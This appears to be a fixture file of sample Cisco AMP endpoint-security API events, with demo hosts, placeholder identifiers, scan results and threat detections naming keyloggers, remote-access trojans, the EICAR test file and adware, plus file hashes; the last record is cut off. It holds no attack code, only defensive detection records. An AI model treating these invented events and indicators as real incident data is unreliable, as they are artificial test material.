-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832267006136549000,"timestamp":1610705083,"timestamp_nanoseconds":294000000,"date":"2021-01-15T10:04:43+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox","clean":true,"scanned_files":97,"scanned_processes":0,"scanned_paths":11,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266988956680000,"timestamp":1610705079,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:04:39+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255730056692000,"timestamp":1610705077,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:04:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255730056691734","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255674222117000,"timestamp":1610705064,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:04:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255674222116885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055368265531000,"timestamp":1610705053,"timestamp_nanoseconds":870000000,"date":"2021-01-15T10:04:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055368265531411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255622682509000,"timestamp":1610705052,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:04:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255622682509332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055359675597000,"timestamp":1610705051,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:04:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055359675596818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055355380630000,"timestamp":1610705050,"timestamp_nanoseconds":667000000,"date":"2021-01-15T10:04:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055355380629521","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1ds","file_path":"\\\\?\\C:\\WINDOWS\\system32\\config\\systemprofile\\Desktop\\s1ds","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662224","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662223","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":885000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694926","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":760000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:04:06+00:00","event_type_id":1090519104,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":928000000,"date":"2021-01-15T10:04:06+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe","attacked_module":"C:\\Program Files\\Mozilla Firefox\\xul.dll","base_address":"0x7D1E0000","suspicious_files":[""],"indicators":[{"tactics":["TA0009"],"severity":"medium","description":"DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.","short_description":"Dealply adware detected","id":"44cfe1c4-3dc4-4619-be6b-88c9d69c2a97","techniques":["T1185"]}]}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055321020891000,"timestamp":1610705042,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:04:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055321020891148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s234","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s234","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255571142902000,"timestamp":1610705040,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:04:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255571142901779","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055308135989000,"timestamp":1610705039,"timestamp_nanoseconds":416000000,"date":"2021-01-15T10:03:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055308135989259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":354000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255523898262000,"timestamp":1610705029,"timestamp_nanoseconds":26000000,"date":"2021-01-15T10:03:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255523898261522","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055260891349000,"timestamp":1610705028,"timestamp_nanoseconds":744000000,"date":"2021-01-15T10:03:48+00:00","event_type":"Threat 